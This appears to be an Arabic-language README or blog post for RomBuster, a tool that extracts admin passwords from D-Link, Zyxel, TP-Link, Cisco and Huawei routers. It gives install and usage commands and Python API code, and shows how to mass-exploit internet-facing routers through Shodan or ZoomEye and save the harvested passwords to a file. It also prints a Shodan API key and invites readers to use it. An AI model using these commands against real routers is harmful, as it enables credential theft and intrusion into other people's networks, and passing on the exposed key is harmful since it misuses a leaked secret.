
RomBuster هي أداة استغلال للموجهات تسمح بالكشف عن كلمة مرور مسؤول الشبكة.
RomBuster هي أداة استغلال أجهزة التوجيه (راوترات) تسمح بكشف كلمة مرور المسؤول لجهاز التوجيه الشبكي.
D-Link و Zyxel و TP-Link و Cisco و Huawei.pip3 install git+https://github.com/EntySec/RomBuster
لاستخدام RomBuster، اكتب rombuster في الطرفية.
usage: rombuster [-h] [-o OUTPUT] [-i INPUT] [-a ADDRESS] [--shodan SHODAN]
[--zoomeye ZOOMEYE] [-p PAGES]
RomBuster is a router exploitation tool that allows to disclosure network
router admin password.
optional arguments:
-h, --help show this help message and exit
-o OUTPUT, --output OUTPUT
Output result to file.
-i INPUT, --input INPUT
Input file of addresses.
-a ADDRESS, --address ADDRESS
Single address.
--shodan SHODAN Shodan API key for exploiting devices over Internet.
--zoomeye ZOOMEYE ZoomEye API key for exploiting devices over Internet.
-p PAGES, --pages PAGES
Number of pages you want to get from ZoomEye.
استغلال جهاز توجيه واحد
دعنا نخترق جهاز التوجيه الخاص بي للمتعة فقط.
rombuster -a 192.168.99.1
استغلال أجهزة توجيه من الإنترنت
لنجرب استخدام محرك بحث Shodan لاستغلال أجهزة التوجيه عبر الإنترنت.
rombuster --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD
ملاحظة: مفتاح Shodan API المقدم (PSKINdQe1GyxGgecYz2191H2JoS9qvgD) هو مفتاح PRO API الخاص بي، يمكنك استخدام هذا المفتاح أو مفتاحك الخاص، فلا تتردد في استخدام جميع مواردنا مجانًا :)
استغلال أجهزة توجيه من ملف إدخال
لنجرب استخدام قاعدة بيانات مفتوحة لأجهزة التوجيه.
rombuster -i routers.txt -o passwords.txt
ملاحظة: سيتم استغلال جميع أجهزة التوجيه في قائمة routers.txt حسب عناوينها وحفظ جميع كلمات المرور التي تم الحصول عليها في ملف passwords.txt.
تمتلك RomBuster أيضًا واجهة برمجة تطبيقات (API) خاصة بها بلغة Python، يمكن استدعاؤها عن طريق استيراد RomBuster إلى الكود الخاص بك.
from rombuster import RomBuster
هذه هي جميع الدوال الأساسية لـ RomBuster التي يمكن استخدامها لاستغلال جهاز توجيه محدد.
exploit(address) - استغلال جهاز توجيه واحد بالعنوان المعطى.استغلال جهاز توجيه واحد
from rombuster import RomBuster
rombuster = RomBuster()
creds = rombuster.exploit('192.168.99.1')
print(creds)